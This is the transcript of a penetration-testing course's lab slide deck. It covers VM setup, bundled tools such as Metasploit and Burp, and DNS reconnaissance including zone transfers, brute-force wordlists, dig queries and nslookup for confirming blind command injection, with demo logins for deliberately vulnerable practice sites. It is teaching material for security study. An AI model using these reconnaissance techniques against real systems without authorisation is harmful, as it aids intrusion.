ch0 Lab.pptx
Document Details
Uploaded by VibrantTulip
Full Transcript
Lab Information Lab Setup You will receive one virtual image file cybrKali.ova Download the file to your hard drive Use VirtualBox or VMWare to import it Or use Kali 2 Log In Username: student (set as default) Password: cybr (case sensi...
Lab Information Lab Setup You will receive one virtual image file cybrKali.ova Download the file to your hard drive Use VirtualBox or VMWare to import it Or use Kali 2 Log In Username: student (set as default) Password: cybr (case sensitive!) Can use sudo for root access (same password) 3 What are Included? LAMP Kali, 64-bit Apache HTTP Server MySQL (root password: mutillidae) PHP Java Runtime Enviroment (JRE) Browser Firefox Chromium Web Browser 4 What are Included (Cont.) Reconnaissance Tools Whois dig nslookup Nmap (Zenmap) DNSRecon Metasploit Netcat (nc) curl Nikto Wireshark Sqlmap 5 What are Included (Cont.) Interception proxies Burp Suite (port 8080) OWASP Zed Attack Proxy (ZAP) (port 8082) Fiddler, for Microsoft Windows, not included Get between the client and the web application Analyze the traffic Inject attacks 6 Targets Mutillidae Altoro Mutual (http://www.altoromutual.com) Use the following credentials to log in to the Altoro Mutual application, Username: jsmith Password: Demo1234 https://www-01.ibm.com/support/docview.wss?uid=swg21288823 Zero Bank (http://zero.webappsecurity.com) login: username password: password 7 WHOIS Use TCP port 43 Whois lookups are stealthier from a reconnaissance standpoint Query goes to Whois servers Output Name(s) and phone number(s) Physical address DNS server (Names and IP addresses are most obvious, immediate use for web app pen testing Public netblocks Iterate through Whois/DNS lookups can be quite helpful https://whois.icann.org/en/about-whois https://www.arin.net/resources/registry/whois/rws/cli/#interpreting-whois-results 8 Domain Name System (DNS) A global hierarchical database of domain names Use UDP port 53 for payload 512 bytes, notably zone transfers Provide a wealth of information and is specifically useful for virtual host discovery https://www.iana.org/domains/root/servers https://data.iana.org/TLD/tlds-alpha-by-domain.txt 9 DNS Zone Transfer Allow secondary DNS servers to mirror off a primary Should not be open to the world Exceptions includes: A non-security-mind ISP manages DNS on behalf of customers Internal DNS servers commonly allow zone transfer from any internal netblock Two types AXFR, full transfer IXFR, incremental transfer 10 When Zone Transfers aren’t Available Reverse DNS (PTR) scans Many DNS admins created reverse (PTR) records for every A recod Perform a whois lookup for IP addresses owned by the target, then perform a reverse DNS lookup for every IP DNS “brute force” (dictionary) scans Can discover more names, virtual hosts, CNAMEs Supply a dictionary of potential DNS names Read each entry Attempt to resolve $entry.example.com Quite useful for virtual host discovery Always scan with permission if performing large DNS brute force scans! 11 DNSRecon DNSRecon by Carlos Perez (@darkoperator) performs many DNS reconnaissance functions Available in /usr/share/dnsrecon in the VM Basic usage: dnsrecon -d with option n: -n Reverse DNS scans dnsrecon -r Include useful dictionaries (called wordlists) for DNS brute force scans dnsrecon -D /usr/share/dnsrecon/namelist.txt: 1,909 entries https://github.com/darkoperator/dnsrecon 12 nslookup Pros Near-universal availability It is usually installed on compromised host, including web servers Useful for confirmation of blind command injection Outbound DNS is often unfiltered Cons Limited functionality compared to dig Functionality has been removed from newer versions 13 dig A fully featured DNS client Available natively on OS X and most UNIX/Linux distros Included in BIND (Berkeley Internet Name Domain) DNS server package $ dig @ example.com options… o -t any o -t ns o -x o -t axfr o dig @nameserver version.bind chaos txt Query the nameserver’s version of BIND 14 Nmap DNS NSE Scripts Nmap has a number of DNS-oriented NSE (Nmap Scripting Engine) scripts Some replicate functionality available via dig Including dns-zone-transfer.nse dns-brute.nse is useful for discovering CNAMEs $ ls /usr/share/nmap/scripts/dns* 15 Metasploit Most popular exploitation framework Commonly associated with network and general exploitation Includes significant web testing capabilities Especially for testing off-the-shelf rather than custom software Numerous relevant exploits for Wordpress, Joomla, Drupal, Oracle DB, SQL server, and many others Has useful DNS information-gathering modules /opt/metasploit-framework/embedded/framework/modules/post/multi/ gather dns_bruteforce dns_reverse_lookup dns_srv_lookup 16 Burp Suite User default port number 8080 Proxy->Options, where port can be changed Two community versions installed Older version is as a desktop shortcut, can scan Laster version is in favorites, without scan function 17 OWASP Zed Attack Proxy (ZAP) Full featured open source interception proxy Desktop shortcut, Favorites, or Run at CLI: zap.sh Set port number Tools->Options->Local Proxies->Port (set to 8082) ZAP’s CA certificate setup in Firefox OWASP ZAP Desktop User Guide https://www.zaproxy.org/docs/desktop/ 18